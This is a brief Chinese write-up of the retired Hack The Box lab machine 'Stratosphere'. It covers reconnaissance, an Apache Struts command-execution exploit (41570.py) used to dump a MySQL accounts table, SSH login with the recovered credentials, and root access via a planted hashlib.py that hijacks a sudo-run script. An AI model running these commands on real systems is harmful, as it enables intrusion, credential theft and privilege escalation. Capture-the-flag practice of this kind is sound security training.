1. 程式人生 > 實用技巧 >HTB-靶機-Stratosphere

HTB-靶機-Stratosphere

本篇文章僅用於技術交流學習和研究的目的,嚴禁使用文章中的技術用於非法目的和破壞,否則造成一切後果與發表本文章的作者無關

靶機是作者購買VIP使用退役靶機操作,顯示IP地址為10.10.10.64

本次使用https://github.com/Tib3rius/AutoRecon 進行自動化全方位掃描

執行命令autorecon 10.10.10.64 -o ./Stratosphere-autorecon

訪問web應用

沒找到有用的資訊,再爆破下目錄發現如下資訊

看url地址顯示猜測有Struts命令執行漏洞,搜尋了下對應的exploit測試如下

可以執行命令,有了如下操作

 python 41570.py http://10.10.10.64/Monitoring/example/Welcome.action '
mysql -u admin -p admin -e "use users;select * from accounts"'

得到了資料庫密碼,試了下ssh登入

執行sudo -l得到如下

可以直接提權了,執行test.py的時候載入了hashlib,通過修改hashlib直接讀取root.txt

echo 'import os; os.system("cat /root/root.txt")' > hashlib.py